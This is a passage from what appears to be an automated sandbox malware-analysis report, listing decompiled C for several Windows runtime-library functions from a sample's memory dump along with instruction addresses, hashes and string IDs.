                                                                                                            0x010e357e
                                                                                                            0x010e358f
                                                                                                            0x010e35a1
                                                                                                            0x010e35a5
                                                                                                            0x010e366b
                                                                                                            0x010e366b
                                                                                                            0x010e366d
                                                                                                            0x010e3672
                                                                                                            0x010e3679
                                                                                                            0x010e3685
                                                                                                            0x010e368d
                                                                                                            0x010e369d
                                                                                                            0x010e36a7
                                                                                                            0x010e36b8
                                                                                                            0x010e36c6
                                                                                                            0x010e36c7
                                                                                                            0x010e36dc
                                                                                                            0x010e36e1
                                                                                                            0x010e36e7
                                                                                                            0x010e36e9
                                                                                                            0x010e36e9
                                                                                                            0x010e3703
                                                                                                            0x010e3703
                                                                                                            0x010e35b5
                                                                                                            0x010e35c0
                                                                                                            0x010e35c4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010e35ca
                                                                                                            0x010e35d7
                                                                                                            0x010e35e2
                                                                                                            0x010e35e6
                                                                                                            0x010e35e8
                                                                                                            0x010e35f5
                                                                                                            0x010e35fa
                                                                                                            0x010e3603
                                                                                                            0x010e3604
                                                                                                            0x010e3609
                                                                                                            0x010e360a
                                                                                                            0x010e3612
                                                                                                            0x010e3613
                                                                                                            0x010e361e
                                                                                                            0x010e3622
                                                                                                            0x010e3628
                                                                                                            0x010e362f
                                                                                                            0x010e362f
                                                                                                            0x010e3636
                                                                                                            0x010e3638
                                                                                                            0x010e363b
                                                                                                            0x010e3642
                                                                                                            0x010e3642
                                                                                                            0x010e3636
                                                                                                            0x010e3657
                                                                                                            0x010e3657
                                                                                                            0x010e365c
                                                                                                            0x010e3662
                                                                                                            0x010e3669
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: BinaryHash
                                                                                                            • API String ID: 0-2202222882
                                                                                                            • Opcode ID: 1403b95bed5ea69fd69982d407295003e548e3b8572f942bb99b3e95fa3013d6
                                                                                                            • Instruction ID: e9c599577d742cbe29fa4a030e87f8e61d8e09546b401c8f248bd7f2a7eb0a60
                                                                                                            • Opcode Fuzzy Hash: 1403b95bed5ea69fd69982d407295003e548e3b8572f942bb99b3e95fa3013d6
                                                                                                            • Instruction Fuzzy Hash: 364145F190052D9FDB21DAA0CC85FDEBBBCAB54714F4045A5E649AB240DB319E88CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 011305AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E011305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E010A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0112A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0112A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01131293(_t79, _v40, E011307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01087D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0112138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                            0x011305c5
                                                                                                            0x011305ca
                                                                                                            0x011305d3
                                                                                                            0x011306db
                                                                                                            0x011306db
                                                                                                            0x011306dd
                                                                                                            0x011306e3
                                                                                                            0x011306e3
                                                                                                            0x011305dd
                                                                                                            0x011305e7
                                                                                                            0x011305f6
                                                                                                            0x01130600
                                                                                                            0x01130607
                                                                                                            0x01130610
                                                                                                            0x01130615
                                                                                                            0x0113061a
                                                                                                            0x0113061c
                                                                                                            0x0113061e
                                                                                                            0x01130624
                                                                                                            0x01130625
                                                                                                            0x01130627
                                                                                                            0x01130628
                                                                                                            0x01130631
                                                                                                            0x01130640
                                                                                                            0x0113064d
                                                                                                            0x01130654
                                                                                                            0x01130654
                                                                                                            0x01130631
                                                                                                            0x0113066d
                                                                                                            0x01130674
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01130692
                                                                                                            0x0113069e
                                                                                                            0x011306b0
                                                                                                            0x011306a0
                                                                                                            0x011306a9
                                                                                                            0x011306a9
                                                                                                            0x011306b8
                                                                                                            0x011306d6
                                                                                                            0x011306d6
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `
                                                                                                            • API String ID: 0-2679148245
                                                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                            • Instruction ID: 064aff933c36dfeb61cecee92b399a653899865deff67118fe3efb50a681d4d1
                                                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                            • Instruction Fuzzy Hash: 88311572304706ABE714DE29CC44F9B7BD9EBC8754F144229FA54EB288D770E914C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E010E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E010A9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01084620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E010A9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                            0x010e3893
                                                                                                            0x010e3896
                                                                                                            0x010e3899
                                                                                                            0x010e389f
                                                                                                            0x010e38a0
                                                                                                            0x010e38a4
                                                                                                            0x010e38a9
                                                                                                            0x010e38ac
                                                                                                            0x010e38ad
                                                                                                            0x010e38ae
                                                                                                            0x010e38af
                                                                                                            0x010e38b1
                                                                                                            0x010e38b4
                                                                                                            0x010e38bb
                                                                                                            0x010e38bc
                                                                                                            0x010e38bd
                                                                                                            0x010e38c4
                                                                                                            0x010e38c8
                                                                                                            0x010e38ca
                                                                                                            0x010e38ca
                                                                                                            0x010e38d5
                                                                                                            0x010e393e
                                                                                                            0x010e3940
                                                                                                            0x010e3942
                                                                                                            0x010e3952
                                                                                                            0x010e3954
                                                                                                            0x010e3961
                                                                                                            0x010e3961
                                                                                                            0x010e3967
                                                                                                            0x010e396e
                                                                                                            0x010e396e
                                                                                                            0x010e3947
                                                                                                            0x010e394c
                                                                                                            0x00000000
                                                                                                            0x010e394c
                                                                                                            0x010e38ea
                                                                                                            0x010e38ee
                                                                                                            0x010e38f8
                                                                                                            0x010e38f9
                                                                                                            0x010e38ff
                                                                                                            0x010e3900
                                                                                                            0x010e3902
                                                                                                            0x010e3903
                                                                                                            0x010e390b
                                                                                                            0x010e390f
                                                                                                            0x010e3950
                                                                                                            0x00000000
                                                                                                            0x010e3950
                                                                                                            0x010e3915
                                                                                                            0x010e391d
                                                                                                            0x010e391d
                                                                                                            0x010e3922
                                                                                                            0x010e3926
                                                                                                            0x00000000
                                                                                                            0x010e3928
                                                                                                            0x010e392b
                                                                                                            0x010e392b
                                                                                                            0x010e3935
                                                                                                            0x010e3937
                                                                                                            0x010e3937
                                                                                                            0x00000000
                                                                                                            0x010e3935
                                                                                                            0x010e3926
                                                                                                            0x010e38f0
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: BinaryName
                                                                                                            • API String ID: 0-215506332
                                                                                                            • Opcode ID: a108b2244056ae32a5cb0c6a54d632f2404a3e1af03a2933f934dfadcf9b7cbc
                                                                                                            • Instruction ID: 7b9a3df7e74bdfc8535cfcb563b2968fd6893beeec0495d33fa3d4bc3bbd1319
                                                                                                            • Opcode Fuzzy Hash: a108b2244056ae32a5cb0c6a54d632f2404a3e1af03a2933f934dfadcf9b7cbc
                                                                                                            • Instruction Fuzzy Hash: 4931E872D0151ABFDB15DA5AC949EAFBFF4FF44720F024169E994AB250D7319E00C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 33%
                                                                                                            			E0109D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x115d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01084120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E010AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E010A98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E010A95D0();
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                            0x0109d29c
                                                                                                            0x0109d2a6
                                                                                                            0x0109d2b1
                                                                                                            0x0109d2b5
                                                                                                            0x0109d2b6
                                                                                                            0x0109d2bc
                                                                                                            0x0109d2bd
                                                                                                            0x0109d2be
                                                                                                            0x0109d2bf
                                                                                                            0x0109d2c2
                                                                                                            0x0109d2c4
                                                                                                            0x0109d2cc
                                                                                                            0x0109d384
                                                                                                            0x0109d34b
                                                                                                            0x0109d34f
                                                                                                            0x0109d350
                                                                                                            0x0109d351
                                                                                                            0x0109d35c
                                                                                                            0x0109d35c
                                                                                                            0x0109d2d6
                                                                                                            0x0109d2da
                                                                                                            0x0109d2e1
                                                                                                            0x0109d361
                                                                                                            0x0109d369
                                                                                                            0x0109d36d
                                                                                                            0x0109d2e3
                                                                                                            0x0109d2e3
                                                                                                            0x0109d2e3
                                                                                                            0x0109d2e5
                                                                                                            0x0109d2ed
                                                                                                            0x0109d2f5
                                                                                                            0x0109d2fa
                                                                                                            0x0109d302
                                                                                                            0x0109d303
                                                                                                            0x0109d30b
                                                                                                            0x0109d30f
                                                                                                            0x0109d313
                                                                                                            0x0109d318
                                                                                                            0x0109d31c
                                                                                                            0x0109d320
                                                                                                            0x0109d379
                                                                                                            0x0109d37d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010daffe
                                                                                                            0x010db001
                                                                                                            0x010db011
                                                                                                            0x00000000
                                                                                                            0x0109d322
                                                                                                            0x0109d322
                                                                                                            0x0109d330
                                                                                                            0x0109d337
                                                                                                            0x0109d35d
                                                                                                            0x0109d339
                                                                                                            0x0109d33f
                                                                                                            0x0109d38c
                                                                                                            0x0109d38c
                                                                                                            0x0109d33f
                                                                                                            0x0109d349
                                                                                                            0x00000000
                                                                                                            0x0109d349

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 94d5208b208f9e41fda9476f53126fb05aed287154358485caa85f20ae425f87
                                                                                                            • Instruction ID: c470122084e117f0cc4025ed147bf1958eec43835e4d9bea7e9293e5af2a668b
                                                                                                            • Opcode Fuzzy Hash: 94d5208b208f9e41fda9476f53126fb05aed287154358485caa85f20ae425f87
                                                                                                            • Instruction Fuzzy Hash: FD31D1B15483019FCB51DFA8C8909AFBBE8FB95654F00892EF9D483210D634DD04DB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01071B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E01071B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E010ABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E010AA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E010AA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01084620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                            0x01071b8f
                                                                                                            0x01071b9a
                                                                                                            0x01071b9c
                                                                                                            0x01071b9e
                                                                                                            0x01071ba3
                                                                                                            0x010c7010
                                                                                                            0x010c7010
                                                                                                            0x00000000
                                                                                                            0x01071ba9
                                                                                                            0x01071ba9
                                                                                                            0x01071bae
                                                                                                            0x00000000
                                                                                                            0x01071bc5
                                                                                                            0x01071bca
                                                                                                            0x01071bcf
                                                                                                            0x01071bd0
                                                                                                            0x01071bd1
                                                                                                            0x01071bd2
                                                                                                            0x01071bd6
                                                                                                            0x01071bdc
                                                                                                            0x01071be0
                                                                                                            0x010c6ffc
                                                                                                            0x010c7000
                                                                                                            0x00000000
                                                                                                            0x010c7006
                                                                                                            0x010c7009
                                                                                                            0x010c7009
                                                                                                            0x01071be6
                                                                                                            0x01071bec
                                                                                                            0x01071c0b
                                                                                                            0x01071c0b
                                                                                                            0x01071c0c
                                                                                                            0x01071c11
                                                                                                            0x01071c12
                                                                                                            0x01071c15
                                                                                                            0x01071c1b
                                                                                                            0x01071c1f
                                                                                                            0x01071c31
                                                                                                            0x01071c33
                                                                                                            0x010c7026
                                                                                                            0x010c7026
                                                                                                            0x01071c21
                                                                                                            0x01071c24
                                                                                                            0x01071c24
                                                                                                            0x01071bee
                                                                                                            0x01071bee
                                                                                                            0x01071bf2
                                                                                                            0x01071c3a
                                                                                                            0x01071bf4
                                                                                                            0x01071bf4
                                                                                                            0x01071c05
                                                                                                            0x01071c05
                                                                                                            0x01071c09
                                                                                                            0x01071c3e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01071c09
                                                                                                            0x01071bec
                                                                                                            0x01071be0
                                                                                                            0x01071bae
                                                                                                            0x01071c2e

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: WindowsExcludedProcs
                                                                                                            • API String ID: 0-3583428290
                                                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                            • Instruction ID: f35841772cb50a7d3e6543180696fc8fd8c3dd5d7d60f860cbf0bd4247c94047
                                                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                            • Instruction Fuzzy Hash: E2210A3790012DEBDB629AD9C840FAF7BEDEF44A50F154465FE949B240D630DD00DBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0108F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                            0x0108f71d
                                                                                                            0x0108f722
                                                                                                            0x0108f726
                                                                                                            0x010d4770
                                                                                                            0x0108f765
                                                                                                            0x0108f769
                                                                                                            0x0108f769
                                                                                                            0x0108f732
                                                                                                            0x010d477a
                                                                                                            0x00000000
                                                                                                            0x010d477a
                                                                                                            0x0108f738
                                                                                                            0x0108f73a
                                                                                                            0x0108f73c
                                                                                                            0x0108f73f
                                                                                                            0x0108f746
                                                                                                            0x0108f778
                                                                                                            0x0108f7a9
                                                                                                            0x0108f7a9
                                                                                                            0x0108f754
                                                                                                            0x0108f75a
                                                                                                            0x0108f75d
                                                                                                            0x0108f75f
                                                                                                            0x0108f761
                                                                                                            0x0108f76f
                                                                                                            0x0108f771
                                                                                                            0x0108f771
                                                                                                            0x0108f76f
                                                                                                            0x0108f763
                                                                                                            0x00000000
                                                                                                            0x0108f763
                                                                                                            0x0108f77d
                                                                                                            0x0108f7a3
                                                                                                            0x0108f7a5
                                                                                                            0x00000000
                                                                                                            0x0108f7a5
                                                                                                            0x0108f77f
                                                                                                            0x0108f782
                                                                                                            0x0108f784
                                                                                                            0x0108f786
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108f788
                                                                                                            0x0108f748
                                                                                                            0x0108f74d
                                                                                                            0x0108f78d
                                                                                                            0x0108f793
                                                                                                            0x0108f7b7
                                                                                                            0x0108f7bc
                                                                                                            0x00000000
                                                                                                            0x0108f7bc
                                                                                                            0x0108f798
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108f79d
                                                                                                            0x0108f7b0
                                                                                                            0x00000000
                                                                                                            0x0108f7b0
                                                                                                            0x0108f79f
                                                                                                            0x00000000
                                                                                                            0x0108f74f
                                                                                                            0x0108f74f
                                                                                                            0x00000000
                                                                                                            0x0108f74f

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Actx
                                                                                                            • API String ID: 0-89312691
                                                                                                            • Opcode ID: 08aa6a6000ac9e51c06a850526177b0cb268e137d492f2f76d05c612d4b68b4a
                                                                                                            • Instruction ID: 2fab502ba58bab25cf2ed97983d8067bfd4d897f586d5f78d607d6a7c85b5c24
                                                                                                            • Opcode Fuzzy Hash: 08aa6a6000ac9e51c06a850526177b0cb268e137d492f2f76d05c612d4b68b4a
                                                                                                            • Instruction Fuzzy Hash: FA11B23570CB038BFB657E3D889073A76D5BB96664F25467AE5E1CB391DB74C8408340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01118DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E01118DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1140d50);
				E010BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E010F5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L010BDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L010BDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E010BD130(_t34, _t39, _t40);
			}





                                                                                                            0x01118df1
                                                                                                            0x01118df1
                                                                                                            0x01118df1
                                                                                                            0x01118df1
                                                                                                            0x01118df1
                                                                                                            0x01118df1
                                                                                                            0x01118df3
                                                                                                            0x01118df8
                                                                                                            0x01118dfd
                                                                                                            0x01118e00
                                                                                                            0x01118e0e
                                                                                                            0x01118e2a
                                                                                                            0x01118e36
                                                                                                            0x01118e38
                                                                                                            0x01118e3c
                                                                                                            0x01118e46
                                                                                                            0x01118e46
                                                                                                            0x01118e36
                                                                                                            0x01118e50
                                                                                                            0x01118e56
                                                                                                            0x01118e59
                                                                                                            0x01118e5c
                                                                                                            0x01118e60
                                                                                                            0x01118e67
                                                                                                            0x01118e6d
                                                                                                            0x01118e73
                                                                                                            0x01118e74
                                                                                                            0x01118eb1
                                                                                                            0x01118ebd

                                                                                                            Strings
                                                                                                            • Critical error detected %lx, xrefs: 01118E21
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Critical error detected %lx
                                                                                                            • API String ID: 0-802127002
                                                                                                            • Opcode ID: fa0bcb52dbaf0aa495cd694bd481543c5a782e64d18c7b8010d2d6c54a38d22e
                                                                                                            • Instruction ID: 0ae01cae8939a9ef7884e39b9b87d31f8be8b0fea955ad88205492c66325e364
                                                                                                            • Opcode Fuzzy Hash: fa0bcb52dbaf0aa495cd694bd481543c5a782e64d18c7b8010d2d6c54a38d22e
                                                                                                            • Instruction Fuzzy Hash: BC118771D15348EBEF28DFA889057DDFBB0BB04314F20822EE5A8AB282C3300602CF14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010FFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
